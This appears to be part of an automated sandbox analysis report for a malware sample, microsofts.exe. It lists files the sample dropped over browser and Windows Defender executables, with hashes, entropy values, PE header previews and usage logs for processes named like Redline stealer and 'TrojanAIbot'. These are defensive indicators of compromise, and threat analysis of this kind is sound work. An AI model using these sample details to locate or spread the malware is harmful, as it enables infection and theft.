Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L...... K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.829773416952378
Encrypted:	false
SSDEEP:	49152:98ErxqTGsitHloGgkiDrCvJVZfEcpwD06LgVCM2hnwLNwiHaGI3Y/685ZYMaWgKQ:Yv2gM+qwXLg7pPgw/DSZHAD527BWG
MD5:	50CA1B8B70AD9DD1DBC4D5F8465BF442
SHA1:	12B6125563D437475493F6D7B9941B5797A0B499
SHA-256:	A9280E8E6E6CF984A79AE55DB5FEAA4DD5EDE9CE53F4A097825C7032CFAC52C2
SHA-512:	FCC5666FDABD960B1F74B4DFEF130B3A819AB28CFDC0A2CD851881DBF067C09A05188FCE910BF862C90169B0D4DFED45E4ED7D3AC262B62A240E9318771301D4
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L......*K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2156544
Entropy (8bit):	6.953595546219379
Encrypted:	false
SSDEEP:	24576:ttjqL8fH+8aUbp8D/8+xyWAnsqjnhMgeiCl7G0nehbGZpbD:/jKK+81FI/8zZDmg27RnWGj
MD5:	8BDEF93A53D2A3701BC0C02F776F5525
SHA1:	0E0D4D7E0159A31EB9BB7C20E08E5332E808881B
SHA-256:	5CA4B92F7C52A8B170FC7F54BB62C163C4D9FE66D969F39FB2B7AB554EB7F401
SHA-512:	62480372185346D3BDAAA20C53457E564345CAE9D37E10D4C0C5CEDF8EECE443785860E85248FA97BC327AB6CC4BE76834DAEF7CFC9F27F1AE823EDFD0D52492
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......F.....................@.............................P".....k.!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.032404842377353
Encrypted:	false
SSDEEP:	49152:UAMsOu3JfCIGnZuTodRFYKBrFDbWpLDmg27RnWGj:UAMa38ZuTSOD527BWG
MD5:	EDC5AEC17063030AF7B5E214E08141DE
SHA1:	FEF4B0C61AD6CAE019004450EACD3A1C240ECE58
SHA-256:	83EE5EF34B43121680683FBD0D0A93CB495FCE848FEAA9CFF4F75E6515824573
SHA-512:	D1463B42D94D6AEDA693767E57902536BCD8ECBD4450AE4602B9A7A02E958777B7F93F40BE3E25780701DDECE3D55AD22C2AA0A3DA572905B33E076599BF4EA9
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.......$... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1984512
Entropy (8bit):	7.104357622280949
Encrypted:	false
SSDEEP:	24576:2wbK7tnhD4aH6wD2Krx5NgOOagQE8J7sqjnhMgeiCl7G0nehbGZpbD:2SK7Fhslq2EPfOGEyDmg27RnWGj
MD5:	08E1430084E5C8FF3DA8932132C6CA58
SHA1:	32692EE655A4BB73F674839756BF7ECBABF5E1A4
SHA-256:	CBE7BD3C373CA9808CC4BFC7317D0634D623518A863548DBCE16750FDBBC7462
SHA-512:	88C1A09AFABD3286D0E9FE6E6BF130BEAB826B0ECDA336E9F424C9C0A4D9661ABE25AD4BEF9AAA168F67FA8B3910AD152C017AA994F5DB42B0A23CACFAB4D94B
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."............................@....................................=..... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1779712
Entropy (8bit):	7.158078877589228
Encrypted:	false
SSDEEP:	24576:FKI7Twj5KDHxJ1FxyD+/wsG18bbQLsqjnhMgeiCl7G0nehbGZpbD:Fv7e0j31mD+/wDGbsDmg27RnWGj
MD5:	8CF935800A2F502FD0EC1707CAB862C5
SHA1:	01786174D1D7609DF13AAADCCDDF15AA09FAF0C2
SHA-256:	9ABD3785B317C4120CA82AA6D0B2A988489D2505CB26128E274A66F24BE0C632
SHA-512:	E082931B88177F5667A221B574ADBBC595A7F9EF63BE17B729B59442EE78DC4867172E5A33AE00389A733774B7107A74B1D1F8011A2AFA9BB006D9B061C07CE1
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."..........B.................@....................................G..... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).........................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.....................@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

C:\Program Files\Mozilla Firefox\crashreporter.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1378304
Entropy (8bit):	5.377446305636286
Encrypted:	false
SSDEEP:	12288:MQUVPDHhSUXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kw:HyhSUsqjnhMgeiCl7G0nehbGZpbD
MD5:	F7D0BD8418D897EDED58B4DBB29463DF
SHA1:	B2A050E1B4A3B78543D9CC823C684A1FFA6CF2B9
SHA-256:	DDCC023E9DA99AFECA6768C032D7D5035E785EF8CBF34EF18A84E4C778BD4BE0
SHA-512:	B053898EDDB5E755CBB6100F166174D1A6B475A5C1B7F3A35E00CB7B56687FD769BB35BDAEDCB75DFFC38CEB3ECD37CD71D03355104ED284FC599C8DEC715E50
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@.............................p.......~.... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc...P... ...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\default-browser-agent.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	7.2221425584285805
Encrypted:	false
SSDEEP:	24576:IsFfc1VyFn5UQn652bO4HTsqjnhMgeiCl7G0nehbGZpbD:IsFcIn5rJ9Dmg27RnWGj
MD5:	990FB99E804987A90D374CB92FCAC903
SHA1:	8090F1A154E43FDA1E437767ADA1BA172B48E64F
SHA-256:	40D3C63D7079B78DEBFF61FEDBB8AFFE964C2520094F82D4DF38D4CAAE7A01C2
SHA-512:	FE02ABF5799A7D939D0595275EE27BB21C3C274879C2547FF2D92CFF6DB34033E78C55A776996D24D65C10373B3AEED9704F56345BDB89E158C2C400AB328198
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@.......................................... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\firefox.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1246208
Entropy (8bit):	7.494295827632693
Encrypted:	false
SSDEEP:	24576:jt9o6p4xQbiKI69wpemIwpel9osqjnhMgeiCl7G0nehbGZpbD:jt9faQbtl2peapel6Dmg27RnWGj
MD5:	59C48C934BC1D62498AF844A9C39D0C8
SHA1:	C1333ADB0940F3F022DB9FDAB5F39D8FA9B0C82F
SHA-256:	65AFBFD68AB3DF315CB2C8426D51ECE73DAD6D524D20AAAED6D6455B8558439B
SHA-512:	99C71635B0C483533784EB13FA4D244E37D9900FA4CFACA3A435242BCB1A949031B026F057DF3EB07816BFA1F90530CD01FF70F13A521456B3587FE3DE5681B9
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................q-.... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\maintenanceservice.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1356800
Entropy (8bit):	5.347851143358513
Encrypted:	false
SSDEEP:	24576:zQVTZu0JLsqjnhMgeiCl7G0nehbGZpbD:EVTZuKDmg27RnWGj
MD5:	EED7B37AF01D3AB1D772B994E84FEFD6
SHA1:	09041CF451B9BAC2E3C68402AA95732C43963F46
SHA-256:	0D475B9951B8D6450F18FF0857135599E289ACFD61094F03106F814C84251BBC
SHA-512:	F26F10DE69E4304EACD09C533EB5A3A883FA262B40382AAB93A73B313C0A8FE12AE5F97989E095A958E0027DED3EA423619DA1B275F63CDD2638CECAD3ED3933
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................P............ .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...P.......@...t..............@...........................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1344000
Entropy (8bit):	6.808403679248105
Encrypted:	false
SSDEEP:	24576:+C1vpgXcZHzJsqjnhMgeiCl7G0nehbGZpbD:+C1vpIcNNDmg27RnWGj
MD5:	6026A47D3CDF77722FEF6DCB9F4E1B6D
SHA1:	92DFEA042AF4252EF1DC09EC4DCB040B69D826BE
SHA-256:	BE254B456376C0353002021844971142F8D3F88217588560BBE1415BEBEF2AB2
SHA-512:	067D29FCB3175196E5904B762E4A083178558B2404472A3F0441717602053DF6FF9D7C77E9DE6C99F9893215339521C6DFFE8B51F9B328D85BC2EFCF922F33E3
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\pingsender.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1200128
Entropy (8bit):	5.140041140567752
Encrypted:	false
SSDEEP:	12288:MSwj9Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:Mv9sqjnhMgeiCl7G0nehbGZpbD
MD5:	B0D2B7F7DF15E679BC15FB184EE97445
SHA1:	97718B220351AFF6109DA49A8E69F46DE3F2140E
SHA-256:	81B33D5986FDE40A04DD38F634162CE7438D96F7EC8887498F7A9CF9C5800156
SHA-512:	5BC779F495C3AD0DB35D335479B1802C0576DF9AF194C9270CFDA577163BB6EFCC467629FE662B10B8B595148683C5958BACAABC4774EDC2EC0C9513984C4890
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.....................................f.... ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc...P...p...@..................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\plugin-container.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1408512
Entropy (8bit):	5.441168819738403
Encrypted:	false
SSDEEP:	24576:9WKntIfGp7sqjnhMgeiCl7G0nehbGZpbD:k8IeFDmg27RnWGj
MD5:	B57803F6EF467AE892B98EC14316B198
SHA1:	1355357EDE8DF1DBBE49558B30537A6A27824B65
SHA-256:	DF073AB2ABAEC2F6D5130FABF94445A292F7B6D9DE3A00E22E71031362F0BAF3
SHA-512:	ABBE484FC43EF20C94560746E426CA6DAF70788EE3DCC3B5A91E95CB00791ECB23C3BB3995C8CFA16C2455E24B8660420393B381C7B65C316DBE8D5299479E46
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@....................................P..... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...P.......@...>..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\private_browsing.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1185280
Entropy (8bit):	5.103307125943374
Encrypted:	false
SSDEEP:	12288:cIhRXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:dRsqjnhMgeiCl7G0nehbGZpbD
MD5:	1A3A34B684A3106B03B7C0898BF99A84
SHA1:	5656241FC121F74C7F0C5806E423C2806F77C6E9
SHA-256:	A2F46102477AD8A637752126FC8A75FDCF5AAF66249FFAF783FAC783D371712A
SHA-512:	B0654B77489D5641BCAB90BFFCC2B0906A0916D1D84584C1E23B0277F458C80E6B8B5F706D25009FC35088237076BF164ABFC08517454C14A722E773DB56EDFC
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@....................................{l.... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc...P...0...@..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1531904
Entropy (8bit):	5.421225132711983
Encrypted:	false
SSDEEP:	24576:c8oREwt2ioQ3J+RYsqjnhMgeiCl7G0nehbGZpbD:c8oRpoFEDmg27RnWGj
MD5:	A88F1DFAAAE8EB2A4720047686F2422B
SHA1:	E3ED2A83BBCAB68643952412FA57CFF6EEBCA1D8
SHA-256:	C883B48FEA8E4412A8C03E7AF48DB8E923D07D63AD010E9EFA985E0E6359EF32
SHA-512:	DC5B67C347C37F3B37ED188E8F92079BB9BE07534ECDAAC7CA9A90ED352C6121E0F80918CD24D1FE2956178536567B40FE06D380E618CC5162370D9C99C17E8D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@.....................................^.... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc...P.......@... ..............@...........................................................................................................................................................................................................................

C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1341952
Entropy (8bit):	5.238616427627673
Encrypted:	false
SSDEEP:	24576:pf8HQlDMxHwJ07wYsqjnhMgeiCl7G0nehbGZpbD:pkHQlqwJ0fDmg27RnWGj
MD5:	1F427DAB6D388D416448E6BA068A6C96
SHA1:	361D9CEC45F88E9BDAA7F1DFFCBF8026E6D85AC4
SHA-256:	BA5A4A28EC3EE56A25B4D9CE42FA0384221BE5A95CC6CA5D998CDEFC817E1CF0
SHA-512:	5D70BB792AC3951CD4D32AD8C9FC311A3FD6A98DA089EA21B24EE08112DE4D549B128B17900BCABFCA06954A0294719353EB1F84CACF61D045DD7AC85251F429
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.....................................F.... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...P.......@...:..............@...................................................................................................................................................................................................................

C:\Program Files\Windows Media Player\wmpnetwk.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\microsofts.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1534464
Entropy (8bit):	7.124630730351051
Encrypted:	false
SSDEEP:	24576:ySEmYD6gjGPG45QVDkfXplyTyrsqjnhMgeiCl7G0nehbGZpbD:y5mYD6g2GWQVQf3yTgDmg27RnWGj
MD5:	46925DE070F4C0CEDC7242883E70DA1E
SHA1:	FD89791A8F63C46348227570DFAC6C9898ACC3E1
SHA-256:	3C19E9EBD81558F745406B3BFDCA43600D1A84BA2B82F41D13A0C64853F651C0
SHA-512:	6ABB29CB1B0BFD82BB2DF620D4862D171A847E4A2FF3D8D973468A5917E23103B82DF3014653F1BB5A4E3411E34EAA374D5390FAAB6E825B508509C0843F87FF
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.....................................[.... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Native_Redline_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.357964438493834
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khav:ML9E4KQwKDE4KGKZI6Khk
MD5:	D8F8A79B5C09FCB6F44E8CFFF11BF7CA
SHA1:	669AFE705130C81BFEFECD7CC216E6E10E72CB81
SHA-256:	91B010B5C9F022F3449F161425F757B276021F63B024E8D8ED05476509A6D406
SHA-512:	C95CB5FC32843F555EFA7CCA5758B115ACFA365A6EEB3333633A61CA50A90FEFAB9B554C3776FFFEA860FEF4BF47A6103AFECF3654C780287158E2DBB8137767
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\build.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\build.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3094
Entropy (8bit):	5.33145931749415
Encrypted:	false
SSDEEP:	96:Pq5qHwCYqh3oPtI6eqzxP0aymTqdqlq7qqjqc85VD:Pq5qHwCYqh3qtI6eqzxP0atTqdqlq7qV
MD5:	2A56468A7C0F324A42EA599BF0511FAF
SHA1:	404B343A86EDEDF5B908D7359EB8AA957D1D4333
SHA-256:	6398E0BD46082BBC30008BC72A2BA092E0A1269052153D343AA40F935C59957C
SHA-512:	19B79181C40AA51C7ECEFCD4C9ED42D5BA19EA493AE99654D3A763EA9B21B1ABE5B5739AAC425E461609E1165BCEA749CFB997DE0D35303B4CF2A29BDEF30B17
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\server_BTC.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\server_BTC.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	410
Entropy (8bit):	5.361827289088002
Encrypted:	false
SSDEEP:	12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
MD5:	64A2247B3C640AB3571D192DF2079FCF
SHA1:	A17AFDABC1A16A20A733D1FDC5DA116657AAB561
SHA-256:	87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
SHA-512:	CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379401388151058
Encrypted:	false
SSDEEP:	48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMugeoPUyus:fLHxvIIwLgZ2KRHWLOugYs
MD5:	4689846024D89F5AABDFA55655DD43FD
SHA1:	5DD556AC947F43C65A1631A3EB5B03E423EEC5DD
SHA-256:	83F556E6E19E0D478D948D3A10DE7B41E7CE8B50C3E7C120AD14E840B7F2BA28
SHA-512:	EC405FBE30E70D7A9A65E8906A47B4D8690ED7F60915BCA064712CC0EEA33002F45A9C412A7D9198499A9CA39A14FCB05EC5CC7D3F2B80BA0D1FEF3107261D59
Malicious:	false
Reputation:	unknown
